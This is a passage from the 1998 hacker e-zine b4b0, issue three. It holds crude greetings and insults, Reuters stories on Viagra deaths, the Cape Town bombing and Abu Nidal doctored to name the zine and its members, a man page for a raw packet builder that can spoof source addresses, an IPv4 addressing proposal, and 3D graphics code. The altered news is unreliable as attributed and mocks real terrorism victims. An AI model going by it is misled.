Power Hacker 2003

home *** CD-ROM | disk | FTP | other *** search

/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / b4b0 / b4b0-03.txt < prev next >

Wrap

Text File | 2002-05-27 | 76.4 KB | 2,090 lines

.s$s .s$$'`$$s. .s$$' b 4 .s$$$' b 0 +-+-+-+-+ `$$$&s. |b|4|b|0| `$SSs. +-+-+-+-+ `$s. .s$$$$' [ (c) 1998 the b4b0 party programme ] `$$$$$$$$$' [ all rights reserved be0tch. ] [ oh yes. ] [ number three. ] [ wee! ] -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- thiz episodez theme: "everybody is entitled to their own opinion as long as they are american." .-------------------. | table of contentz | `-------------------' (1) introduction . . . - [jsbach] (2) b4b0 world newz - [ge0rge] (3) ippacket 2.0 - [chrak] (4) The Preservation of IPv4 - [r4lph] (5) An introduction to 3D graphics programming - [aqua] (6) ASM on the Linux/i386 platform - [chrak] (7) b4b0 misc, warnings, etc [ge0rge] (8) Golf Telephony Juarez - [Qytpo] (9) a fuqn awesome minicom static buffer overflow - [ohday] (A) a high level sockets API - [presonic] (B) writing lkm's - [segv] (C) HP-UX security pt 2 - [tip] (D) Compiled Sparc Assembly Language d0x - [various !] writerz, misc. ------------- The Fearless Leader of b4b0! ge0rge Some Canadian Kid r4lph m4lph An English Stealer-of-American Women gR3-0p Manager of the Hotel California phFh4ck3r Not Usually Around lh0ar Guy With a Big Afro qytpo Mister Nice Guy tEEp White, Black, Male, Female KuR4cK Loves Frosted Flakes seegn4l The Bovine Rebel thE miLk An Aussie Be0tch d00k Harpoon boy pres0niq greets: _jenna, vect0rx, sadjester, ashtray lumber jacks, monica lewinski, bin laden, bert & ernie, c0t, israel, afghanistan (your guns are on the way), sudan, r4lphs mom, mira sorvino, seegn4l's dad, katie holmes, and newt gingrich. fuck yous: "the establishment", siliteks father, siliteks mom, silitek, United States Government, Coolio, #hackphreak, irc warriorz, you ppl who knock on my door asking if i want to buy books, you people who come and talk to me about god when im on the street, you people who come and arrest me for pissing on your car, and you people who don't l0ve b4b0! Official Idiot(s) Of the Month (more than one this issue) ------------------------------ coolio this kid has absolutely NO skill whatsoever at anything. Please, do your part and make fun of him for a better america. JP of Antionline.com. You figure it out. Quote(s) of the Month ------------------ "dude, I'm diverse" -r4lph m4lph "I want to publish zines, and rage against the machine..." -"Flagpole Sitta" Harvey Danger "Did I miss a fucking meeting with the coffee?" - "Lock and Load" Dennis Leary "Everyone is so1o until proven otherwise." - ekiM [ introduction - jsbach ]-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Hi, I'm the editor for this edition of b4b0. We decided that we'd trade off editorship each issue... At any rate, it'd be cool if we started getting submissions from people on the inet, so that not all the articles are by the regular b4b0 staff. For now, you can send feedback, articles, etc to --> submissions@b4b0.org If u don't have a submission but have something to say send it to letters@b4b0.org !! SORRY ABOUT THE LATENESS OF THIS ISSUE ITS JUST PEOPLE SAY THEY WILL WRITE SHIT AND THEN THEY DON'T *****************************************************************/ [ 2 - b4b0 w0rld gn00z! ]- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- FDA says 69 deaths among U.S. b4b0 readers By Jonathan Wright WASHINGTON (Reuters) - At least 69 Americans who took the erection-enhancing zine b4b0 died in the first four months it was on the market, the Food and Drug Administration (FDA) said in a new report. But the deaths, which have been mounting steadily over the months, may not indicate any special danger from the b4b0 Inc. (b4b0 - news) zine, given the age, health and large number of men who are reading it, specialists said. Doctors have written out 3.6 million prescriptions and millions of men have read the zine, which was hailed on its release in March as the long-awaited wonder zine for many men who had difficulty getting an erection. ``If there is a one in 100,000 chance of something happening that's pretty low ... What I tell my patients is that there is uncertainty. I think it's a safe zine but I think long-term studies are going to tell us how this works out,'' James Barada, a urologist in Albany, New York, told Reuters Wednesday. The FDA, collating voluntary accounts from many sources, said 18 of the patients died during or immediately after sexual intercourse. Within a further five hours of reading the zine, seven others had begun to show whatever symptoms eventually led to death, said the the report that was posted Monday on the agency's Internet site. Dr. David Flockhart, an expert in zine interactions at Georgetown University in Washington, said in a recent interview that it would be very hard to blame such deaths on b4b0. ``I wonder what the baseline death rate is without b4b0,'' he said. ``How many people die during the act anyway?'' ``If you age-index it for how many medical problems the individuals have and you take out those who took it inappropriately, I don't know of any huge disasters,'' William Steers of the University of Virginia said of earlier figures. The FDA noted that the link with b4b0 was circumstantial and it did not know how comprehensive its data was. ``An accumulation of adverse event reports does not necessarily indicate that the adverse event was caused by the zine. The event may be due to an underlying disease or some other factor or factors,'' the report said. ``As with all approved medications, the FDA will continue to monitor the ... safety of b4b0 by carefully reviewing reports of death and other serious adverse events and will continue to evaluate the need for regulatory action,'' it added. The FDA received reports of 123 patients dying after being prescribed b4b0, including 12 foreigners. In the case of 30, the reports were from unverifiable sources and another 12 people may not have read the zine, despite having the prescription. Of the remaining 69 U.S. patients -- 66 identified as men and three of unidentified gender -- two had strokes and 46 had cardiovascular events. The cause of death was unknown or not mentioned in the other 21 cases. Reports to the FDA gave ages for 55 of the dead. They ranged from 29 to 87, with a median of 64, it said. Fifty-one of the 69 patients had one or more of the factors associated with cardiovascular diseases or cerebrovascular disease, such as hypertension, smoking or obesity. Twelve of the men who died had taken nitroglycerin or a nitrate medication, which can be fatal if taken in conjunction with b4b0. b4b0 acts by enhancing the muscle relaxant effects of nitric oxide, a chemical that is normally released in response to sexual stimulation. This allows increased blood flow into certain areas of the penis, leading to an erection. The labeling warns patients not to mix it with nitrate-based heart drugs and advises a thorough medical examination before the drug is prescribed. ``There is a degree of cardiac risk associated with sexual activity; therefore, physicians may wish to consider the cardiovascular status of their patients prior to initiating any treatments for erectile dysfunction,'' the labeling adds. But one consumer group, Public Citizen, said last week that the labeling was not strong enough. ``The FDA, in their rush to approve this zine, never put this zine before an advisory committee,'' said Dr. Sidney Wolfe, director of Public Citizen's health research group. ``There are a number of studies in different species showing damaged blood vessels with long-term use. This is not terribly surprising but there is no mention in the labeling,'' he added. The American College of Cardiology and the American Heart Association have expressed concern about the use of b4b0 by patients with any kind of heart disease. Barada, who helped draw up erectile dysfunction guidelines for the American Urological Association, said he was concerned about the deaths because some people may have a special sensitivity to the zine and some doctors might be prescribing it to the wrong people. ``There may be a population that is more sensitive to these zines than we were able to pick up in the trials. It may be playing Russian roulette with an elite zine ,'' he said. S.Africa refuses to be stage of global conflict By Emma Thomasson CAPE TOWN (Reuters) - A bomb that exploded in a Cape Town restaurant was apparently linked to U.S. strikes on b4b0!, but South Africa warned Wednesday it would not allow its territory to become a stage for foreign conflict. ``We cannot allow our country to become a theater for experiments in international terrorism,'' South African Safety and Security Minister Sydney Mufamadi told a news conference. Police initially said two people had died in Tuesday's blast at Cape Town's Planet Hollywood restaurant. They said 27 were also injured. On Wednesday, however, police spokesman Wicus Holtzhausen told Reuters there had been an error and that only one person, separately identified as 50-year-old bank employee Fanie Schoeman, died at the scene when his legs were blown off. ``There was a lot of confusion between ambulance people. One guy said one died on the scene and one died on his way to hospital. But it was the same guy,'' he said. Mufamadi said detectives who helped probe the recent bombing of the U.S. embassy in Nairobi were due to arrive later on Wednesday to help investigate the attack. ``We feel there is something that can be gained by sharing experiences, sharing notes,'' he said. President Nelson Mandela said he was certain the police had good leads on the bombing and b4b0. ``I have no doubt that b4b0 actually committed this crime and I'm confident that they're going to arrest them,'' Mandela said after a function at a school in rural Transkei. Police spokesman John Sterrenberg told Reuters investigators were viewing video material, thought to be from the restaurant's security cameras, but said he could not give further details for fear of jeopardizing the probe. The South African Broadcasting Corporation said in its main news bulletin that it was in possession of video footage of a b4b0 member in the blast but would not release it in the interest of ongoing investigations. Two callers, claiming to represent the local b4b0 group told the Cape Talk radio station on Tuesday the bombing was in retaliation for U.S. missile attacks on Afghanistan and Sudan last week. The group later denied it was behind the attack. A spokeswoman declined to comment on the blast, but told Reuters all would be revealed at a news conference on Thursday morning. President Clinton said he had ordered the raids in retaliation for the bombings of the U.S. embassies in Nairobi and Dar es Salaam and to forestall further attacks. He said the targets were operations linked to Saudi-born Moslem militant Osama Bin Laden (phfH4ck3r as known by b4b0), whom the United States accuses of organizing and financing the embassy attacks. Mufamadi said if the Cape Town bombing proved to be linked to the attacks in Nairobi and Dar es Salaam, it would be the first case of international terrorism in South Africa. South African stocks plunged on Wednesday, at one stage shedding nearly nine percent, as the bomb blast and a sharp rise in producer inflation fanned renewed fears over stability in emerging markets worldwide. A hospital official said eight-year-old British visitor Laura Giddings lost a foot and, with her three-year-old brother Jacob, was in a serious condition in hospital. Their father Tony suffered a broken leg and their mother Mandy and grandfather Brian also were hurt in the blast. Mark Lyall Grant, acting British High Commissioner, said his government condemned the attack, particularly because it had targeted a popular tourist area. ``This family has been ripped apart by the blast,'' he told a news conference after visiting the Giddings in hospital. He said four other British citizens and one Argentinian had also been injured in the attack. Britain had reviewed its travel advice on South Africa, which hosts around 300,000 Britons a year, he added. Britain always warned of the high levels of crime in the country, he said, but was now urging its citizens to exercise special caution after the bomb. Peter Gastrow, an analyst at the South African Institute for Strategic Studies, told Reuters the blast could pitch Cape Town's small, radical Muslim community into a world campaign against the United States. ``It enables them to place themselves into the international network that has similar agendas,'' he said. Sheikh Achmed Seddik, a spokesman for the Moslem Judicial Council, condemned the attack. ``We're obviously condemning this bombing in the strongest terms. It is uncalled for and senseless,'' he told Reuters. But he said the b4b0 community would go ahead with a march, planned and approved by police before Tuesday's blast, on the U.S. mission in Cape Town on Saturday to protest against the U.S. attacks in Sudan and Afghanistan. ''Terrorist'' tEEp (abu nidal) jailed in Egypt: LA Times WASHINGTON (Reuters) - Palestinian extremist Abu Nidal (aka tEEp from the b4b0 zine), ''whose reign over a terrorist network in the 1980s made him one of the world's most dangerous men,'' is being held by authorities in Egypt, the Los Angeles Times reported in Tuesday editions. Quoting unnamed U.S. officials, the Times reported that tEEp ``apparently was caught after he crossed the border from Libya, where he has been headquartered for several years.'' Few additional details were known, the newspaper said. ``Recent reports in the Arab press have suggested that tEEp is ailing and might require advanced medical care unavailable in Libya,'' the Times reported. tEEp is linked to ``terrorist attacks in 20 countries that killed or injured almost 900 people,'' the Times said. tEEp heads the Fatah Revolutionary Council, one of 12 groups which had its assets frozen by President Clinton in 1995 for waging campaigns to undermine the Middle East peace process. According to the newspaper, Egypt has denied reports about holding tEEp. It quoted U.S. officials as saying the Egyptian government was concerned about potential reaction. Although his organization is smaller than in the past, ``it still commands several hundred members in the Mideast, including Lebanon, Sudan, Syria and Iraq, with a 'limited overseas support structure,'' according to the State Department's Patterns of Global Terrorism 1997,'' the Times said. [ ippacket 2.0 (chrak) ]-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- (the actual program is in b4b0.3.tgz) ippacket(1) ippacket(1) NAME ippacket - constructs ip packets SYNOPSIS ippacket <-N> [-p protocol <proto_options>] DESCRIPTION constructs ip packets. tcpdump -Svt is useful for use with this program OPTIONS option desc (default) ALL: -N if first arg, the program will be run in ncurses mode -s source_ip -d dest_ip -I IP identification (random) -T IP ttl (60) -D data to add to end of any type of packet -W write outgoing packet to file -p protocol (IPPROTO_RAW) -p '?' shows other avail- able protocols -r <num> (1) -r -1 will repeat packet send forever, else repeat num times TCP and UDP: -x udp/tcp source port (7777) -y udp/tcp destination port (7778) TCP only: -f TCP flags (TH_FIN) -f '?' shows other available flags -u urgent pointer (0) use with -f TH_URG -w tcp window size (512) -q tcp sequence number size (0) 1 ippacket(1) ippacket(1) -a tcp ack number size (0) ICMP only: -i ICMP type (ICMP_ECHO) -i '?' shows other available types EXAMPLES see /usr/doc/ippacket-2.0/README BUGS If i knew theyed be fixed! AUTHOR shaki-!!! + fatima!!! [ The Preservation of IPv4 ] x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- ============================================ == The Preservation of IPv4 (sort of) == ====== Node Network Topology ======= by r4lph ======================= r4lph@b4b0.org ============ |INTRODUCTION| ============ As with all new ideas, you must keep an open mind while reading this document. "Have some sort of imagination when reading this article", as jsbach has said. New ideas are meant to be incomplete, and must leave room for improvement. This article addresses two of the main problems with the existing IP protocol, IPv4. The first being a shortage of IP addresses, and the second being the ever increasing size of routing tables. Like I said, the ideas in this article are far from complete, and not all effects of the "for every action there is a reaction" adage are worked out. The reason I wrote this article is because in the very near future the IP next generation (IPng) group, are going to shove something in our faces called IPv6, and I think it sucks. The arival of something like IPv6 is inevitable, although I have grown to close to IPv4 to just watch it be over taken by IPv6 without even looking at another possible solution. ========== |BACKGROUND| ========== Here I'm just going to give a little bit of background, it's probably not needed for those of you that are at all familiar with IP. Ok, under IPv4, we're running out of IP addresses to assign, plain and simple. Not only that, but with the exponensial growth of the internet, routing tables on internet gateways/routers are becoming larger and larger. There have been several efforts in the past, and present, to work with IPv4 efficiently until IPv6 is fully implemented. The Internet Assigned Numbers Authority (IANA), the dudes that give you your IP addresses if you request a class A, B, or C, have made many a plea to the internet community, to return unused IP addresses. Classless Inter-Domain Routing (CIDR) was also an effort made in the early 90's to help reduce routing table size, and help conserve IP addresses by eliminating the idea of classes. For more information, consult RFC's - 1517, 1518, 1519, and 1520. This approach was succesful for a while, but as the internet grows, no matter how we try to save IP addresses, we need MORE. As it is, the number of 32 bit IP addresses in existance, including class D and class E addresses is 4294967296 (2^32). Sounds like alot doesn't it? Well do the math for the proposed 128 bit IP address in IPv6. ====== |THEORY| ====== The basic theory behind my entire idea, is that only internet gateways/routers are assigned IP addresses. If you have a subnet with a router or gateway, it is assigned an IP address also. The rest of the computers on your network are assigned an 8 bit "node address". This "node address" is not assigned by any central authority like the IANA, and it need not be registered anywhere other than the router or gateway governing the subnet, or net that the computer in question is on. Now some of you might be thinking, "oh so the internal computers are invisible to the internet", well no, they're not. If you think about a gateway that has the IP address 1.1.1.1 and under the gateway there are 5 nodes, numbered 1-5, the rest of the internet sees the 3rd node on this network as 1.1.1.1-3. I'll show you how we let the gateway/router know what node to pass the packet along to in a later section, along with all the other more detailed information about these concepts. As you can see, by assigning only gateways/routers IP addresses, we can use them efficiently, and surely have enouph of them to serve the internet community. Strain on routers is removed due to the fact that they must only "know" about other routers/gateways. ========= |SPECIFICS| ========= Now I will explain the details of this idea, and the problems that it may pose. I left alot of areas untouched or unfinished for various reasons from, "I dont know enouph about the subject", to, "it would just make the file to facking BIG". First off I will explain the new IP packet structure. It's very simple, only 2 fields must be added, an 8 bit destination node field, and an 8 bit source node field. These 8 bit fields allow for 256 nodes under any one router/gateway. The new IP packet header is illustrated in FIG.1 (Taken from rfc791). FIG.1 *NOTE* Each "-" represents 1 bit. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source-Node | Dest-Node | Options | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Options(cont)| Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ So the idea is that "Source-Node" is the computer under the gateway/router with the IP address in "Source Address", and "Dest-Node" is the computer under the gateway/router with the IP address in "Destination Address". All routing between the two gateways/routers that the nodes in question belong to proceeds as it would with normal IPv4 implementations. The "Source-Node" and "Dest-Node" fields are transparent to all routers in between the "Source Address" and "Destination Address" gateways/routers. When the destination gateway/router gets the packet, it will forward it to the node in the "Dest-Node" field. The computer which just recieved the packet will send a packet back in the same manner. It will use the "Source-Node" address of the incoming packet as the "Dest-Node" in the outgoing packet. And it's own node address as the "Source-Node" in the outgoing packet. The rest of the packet fields are filled out as they would be normally, and the packet is sent. Again, the "Dest-Node" and "Source-Node" fields are transparent to all gateways/routers en route to the "Destination Address", upon arrival, the "Destination Address" gateway/router forwards the packet to the node in "Dest-Node". Heres a time line, IP addresses/node addresses are represented like this, 1.1.1.1-14, given that 1.1.1.1 is the IP address of the router/gateway and 14 is the node address of the computer under 1.1.1.1. - 1.1.1.1 is the source gateway - 8.8.8.8 is the destination gateway - 2.3.4.5 is misc. internet router no.1 - 3.4.5.6 is misc. internet router no.2 * node number 5 on the under the source gateway wants to send a packet to * node number 12 under the destination gateway. [1] 1.1.1.1-5 --> 1.1.1.1 [2] 1.1.1.1 --> 2.3.4.5 [3] 2.3.4.5 --> 3.4.5.6 [4] 3.4.5.6 --> 8.8.8.8 [5] 8.8.8.8 --> 8.8.8.8-12 [1] The source node sends the packet to the source gateway. [2] The source gateway sends the packet to misc. router no.1. [3] Misc. router no.1 sends the packet to misc. router no.2. [4] Misc. router no.2 sends the packet to the destination gateway. [5] The destination gateway sends the packet to the destination node. A method of assigning node addresses to an ethernet interface would have to be developed. Something like the use of "ifconfig" to assign IP addresses to ethernet interfaces. Routing tables on gateways/routers would have to be modified to take into consideration the node addresses that are under that gateway. To route packets to another subnet on the same network, you'd use the same procedure as to route to a completely different network. Protocols that do not have IP below them must be modified to reflect the "node" concept. Other protocols need little to no modification. ========== |CONCLUSION| ========== The concept of Node Network Topology is less than complete, but it's not that far fetched. With some further developement, some of these ideas could be implemented (like that will ever happen). Anyways, I think we need more ideas like this as alternatives to IPv6 for IPng to consider. This type of network would require many rewritten network configuration tools, and everyday applications would need to be modified to reflect this idea. If you have any comments or additions , email me, digital@legions.org. r4lph digital@legions.org [Beginning 3D Programming (jsbach) ]-x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- ------------------------------------------------------------------------------ Beginning 3D Programming (c) aqua 1998 all rights reserved email: jsb4ch@hotmail.com ------------------------------------------------------------------------------ Seeing a freeware C/asm 3D engine was what motivated me to learn to code... There is nothing like being able to explore the surreal sort of mathematical universe one can create inside her computer. In some sense, to be a computer programmer, is to be a GOD !$@#& =). Given a 500 dollar piece of shit 486, you can create a virtual universe in which you can explore and create for your entire life if you are so inclined. The following is a *basic* and short introduction to 3D programming... Nothing interactive, and not much math. In other words, this will bore and patronize ppl who know their sh10t ;). I'm not a good tutorial author.. USE THE SOURCE AND FIGURE IT OUT "!!!" =) **************************** **** 3D CONCEPTS *********** **************************** The idea behind 3D computer graphics is that we need to represent 3 dimensional coordinates on a 2 dimensional plane ( the screen "!" ). Suppose we had these coordinates: x y z coord 1: { 1, 2, 3 } coord 2: { 1, 2, 4 } coord 3: { 2, 4, 6 } Now we want to plot them on the screen. We could just drop the z coordinate, so we'd be plotting: coord 1: { 1, 2 } coord 2: { 1, 2 } coord 3: { 2, 4 } This is indeed how some engineering graphing software operates, but it wouldn't look too realistic in an artificial universe!@#$ Upon quick examination, we see that coordinates 1 and 2 are plotted in the same place, although they don't share the same z coordinate. If you think long and hard, you'll realize that we can simulate three dimensions on the screen via doing something like this: 3d coords : { x , y , z } 2d coords : { x/z, y/z } We are taking the z coordinate into account by dividing x and y by it. The larger z is, the smaller x and y will be (they will appear farther away), and as z gets smaller, x and y will increase (they will appear closer). This equation iz simple and beautiful ;) This is the basis behind my starfield program, listed below. Try to figure it out ;) Compile it and run it like this: % gcc starfield.c -L /usr/X11R6/lib -I /usr/X11R6/include -lX11 -lm % ./a.out & /************************************************************************ *****************begin 3d_tutorial_starfield.c "!"*********************** *************************************************************************/ /* by jsbach in like april '98 (i think) */ #include <X11/Xlib.h> #include <assert.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #define NUM_POINTS 5000 Display *display; Window window; GC graph; int blackcolor, whitecolor, count, count1, viewing_distance; struct point { int x; int y; int z; }points[NUM_POINTS]; struct projection { int x; int y; }projections[NUM_POINTS]; void setup(void); int point(struct point *coord); main(int argc, int **argv) { setup(); for (count=0; count < NUM_POINTS; count++) { points[count].x=(rand()%350); /* randomize z points "!" */ points[count].y=(rand()%350); points[count].z=(rand()%350); if (points[count].z == 0) points[count].z=1; printf("%d %d %d\n", points[count].x, points[count].y, points[count].z); } for(;;) { XEvent e; XNextEvent(display, &e); if (e.type == MapNotify) break; } while(1) { for(count1=0; count1 < 400; count1++) { for(count=0; count < NUM_POINTS; count++) { projections[count].x=(points[count].x*viewing_distance+6000)/points[count].z; projections[count].y=(points[count].y*viewing_distance+6000)/points[count].z; point((struct projection *)&projections[count]); } viewing_distance++; XClearWindow(display, window); } viewing_distance=0; } } int point(struct point *coord) { XDrawPoint(display, window, graph, coord->x, coord->y); } void setup(void) { viewing_distance=0; display=XOpenDisplay(NULL); assert(display); blackcolor=BlackPixel(display, DefaultScreen(display)); whitecolor=WhitePixel(display, DefaultScreen(display)); window=XCreateSimpleWindow(display,DefaultRootWindow(display), 0, 0, 800, 800, 0, blackcolor, blackcolor); XSelectInput(display, window, StructureNotifyMask); XMapWindow(display, window); graph=XCreateGC(display, window, 0, NULL); XSetForeground(display, graph, whitecolor); } /***************************************************************************** ************************END 3d_tutorial_starfield.c************************* ****************************************************************************/ NO! You don't understand it yet! Go back and study it some more ! Ok, if you don't understand the above program, you'll be clueless for the rest of the tutorial, so FUCK YOU!@$ Anyways, wh0rd, we plotted tons of 3d points on the screen and moved em around.. Now, it'd be nice to be able to project shapes onto the screen. To do this, all we need to do is project individual points onto the screen and then draw lines in between them. The way I did this in the next example is to have a struct shape{} that defined connections between points... There's also a rotation function in here that I'm not going to explain (I suck at trig and I couldn't explain it worth shit... feel free to rip it tho ;) You might call the below program a 3d "engine", because it provides a set of functions to display and manipulate 3d objects. /************************************************************************* ************BEGIN minimalist_3d_engine_example.c ************************ ************************************************************************* */ // camera-less wireframe 3d engine by jsbach #include <X11/Xlib.h> #include <assert.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <math.h> #define MAXPOINTS 50 #define MAXCONNECTIONS 9 Display *display; Window window; GC graph; int blackcolor, whitecolor, count, count,subscript, bleh=0; float viewing_distance; /***************** STRUCTURES ***********************/ struct point { float x; float y; float z; int connection[MAXCONNECTIONS]; int numconnections; }; struct projection { float x; float y; }; struct object { struct point points[MAXPOINTS]; struct projection twodee[MAXPOINTS]; struct point location; char numpoints; }cube; /******************* PROTOTYPES ************************/ void drawobject(struct object shape); void eraseobject(struct object shape); void rotate(struct object *shape, float degrees_x, float degrees_y); void project(struct object *shape); void initialize_shapes(void); void setup(void); /***************** MAIN LOOP "!"!"!"!"!"! *****************/ void main(int argc, int **argv) { setup(); /* **********INITILIZATIONS************************** */ subscript=0; subscript++; cube.points[subscript].x=100; cube.points[subscript].y=100; cube.points[subscript].z=100; // 0 cube.points[subscript].connection[0]=1; cube.points[subscript].connection[1]=2; cube.points[subscript].connection[2]=3; cube.points[subscript].numconnections=3; subscript++; cube.points[subscript].x=-100; cube.points[subscript].y=100; cube.points[subscript].z=100; cube.points[subscript].connection[0]=4; cube.points[subscript].connection[1]=6; cube.points[subscript].connection[2]=7; cube.points[subscript].numconnections=3; subscript++; cube.points[subscript].x=100; cube.points[subscript].y=-100; cube.points[subscript].z=100; cube.points[subscript].connection[0]=4; cube.points[subscript].connection[1]=5; cube.points[subscript].connection[2]=7; cube.points[subscript].numconnections=3; subscript++; cube.points[subscript].x=100; cube.points[subscript].y=100; cube.points[subscript].z=-100; cube.points[subscript].connection[0]=5; cube.points[subscript].connection[1]=6; cube.points[subscript].connection[2]=7; cube.points[subscript].connection[3]=8; cube.points[subscript].numconnections=4; subscript++; cube.points[subscript].x=-100; cube.points[subscript].y=-100; cube.points[subscript].z=100; cube.points[subscript].connection[0]=5; cube.points[subscript].connection[1]=6; cube.points[subscript].connection[2]=7; cube.points[subscript].connection[3]=8; cube.points[subscript].numconnections=4; subscript++; cube.points[subscript].x=100; cube.points[subscript].y=-100; cube.points[subscript].z=-100; // 5 cube.points[subscript].connection[0]=5; cube.points[subscript].connection[1]=6; cube.points[subscript].connection[2]=7; cube.points[subscript].connection[3]=8; cube.points[subscript].numconnections=4; subscript++; cube.points[subscript].x=-100; cube.points[subscript].y=100; // 6 cube.points[subscript].z=-100; cube.points[subscript].connection[0]=5; //cube.points[subscript].connection[1]=6; cube.points[subscript].connection[2]=7; cube.points[subscript].connection[3]=8; cube.points[subscript].numconnections=3; subscript++; cube.points[subscript].x=-100; cube.points[subscript].y=-100; // 7 cube.points[subscript].z=-100; cube.points[subscript].connection[0]=5; cube.points[subscript].connection[1]=6; cube.points[subscript].connection[2]=7; cube.points[subscript].connection[3]=8; cube.points[subscript].numconnections=4; cube.location.x=300; cube.location.y=300; cube.location.z=300; cube.numpoints=8; viewing_distance=150; /***********************************************/ /***********************************************/ XSetForeground(display, graph, whitecolor); XFillRectangle(display, window, graph, 0, 0, 800, 1000); /* animation */ while(1) { project(&cube); rotate((struct object *)&cube, .0005, .0005); //cube.location.z+=.1; //cube.location.x+=.1; //cube.location.y-=10; viewing_distance+=.03; if (viewing_distance > 320 ) viewing_distance=0; eraseobject(cube); /* this call is the bottleneck... */ drawobject(cube); } } /******************** END MAIN LOOP BAHAHAHAH ************/ /*************** FUNCTIONS *****************/ void drawpoint(struct point coord) { XDrawPoint(display, window, graph, coord.x, coord.y); } /**************** DRAW OBJECT *****************/ void drawobject(struct object shape) { int temp; int temp2; XSetForeground(display, graph, whitecolor); for(temp=shape.numpoints; temp > 1; temp--) { for(temp2=shape.points[temp].numconnections; temp2>0;temp2--) { XDrawLine(display, window, graph, shape.twodee[temp].x, shape.twodee[temp].y, shape.twodee[shape.points[temp].connection[temp2]].x, shape.twodee[ shape.points[temp].connection[temp2]].y); } } XFlush(display); } void eraseobject(struct object shape) { int temp; int temp2; XSetForeground(display, graph, blackcolor); for(temp=shape.numpoints; temp > 1; temp--) { for(temp2=shape.points[temp].numconnections; temp2>0;temp2--) { XDrawLine(display, window, graph, shape.twodee[temp].x, shape.twodee[temp].y, shape.twodee[shape.points[temp].connection[temp2]].x , shape.twodee[ shape.points[temp].connection[temp2]].y ); } } XFlush(display); } /************* PROJECT OBJECT **********************/ void project(struct object *shape) { int temp; for(temp=shape->numpoints; temp > -1; temp--) { if(shape->points[temp].z == 0) shape->points[temp].z=100; // printf("z is %f \n x is %f \n y is %f \n", shape->points[temp].z, shape- >points[temp].y, shape->points[temp].x); shape->twodee[temp].x=(((shape->points[temp].x + shape- >location.x)*viewing_distance)/ (shape->points[temp].z+shape->location.z))+150; shape->twodee[temp].y=(((shape->points[temp].y+shape- >location.y)*viewing_distance)/ (shape->points[temp].z+shape->location.z))+150; } } /********************** ROTATION ************************/ void rotate(struct object *shape, float degrees_x, float degrees_y) { int temp; for(temp=shape->numpoints; temp > 0; temp--) { shape->points[temp].x=((shape -> points[temp].x*cos(degrees_x)) - (shape -> points[temp].y*sin(degrees_x))); shape -> points[temp].y=((shape->points[temp].x*sin(degrees_y)) + (shape -> points[temp].y*cos(degrees_y))); // shape -> points[temp].z=((shape->points[temp].z*sin(degrees)) + // (shape -> points[temp].z*cos(degrees))); } } /************************** SETUP *****************/ void setup(void) { viewing_distance=10; display=XOpenDisplay(NULL); assert(display); blackcolor=BlackPixel(display, DefaultScreen(display)); whitecolor=WhitePixel(display, DefaultScreen(display)); window=XCreateSimpleWindow(display,DefaultRootWindow(display), 0, 0, 800,1000, 0, blackcolor, blackcolor); XSelectInput(display, window, StructureNotifyMask); XMapWindow(display, window); graph=XCreateGC(display, window, 0, NULL); XSetForeground(display, graph, whitecolor); for(;;) { XEvent e; XNextEvent(display, &e); if (e.type == MapNotify) break; } XEventsQueued(display, QueuedAfterFlush); XFlush(display); } /************************************************************************ ***************** END minimalist_3d_engine_example.c ****************** ************************************************************************/ OK, this was 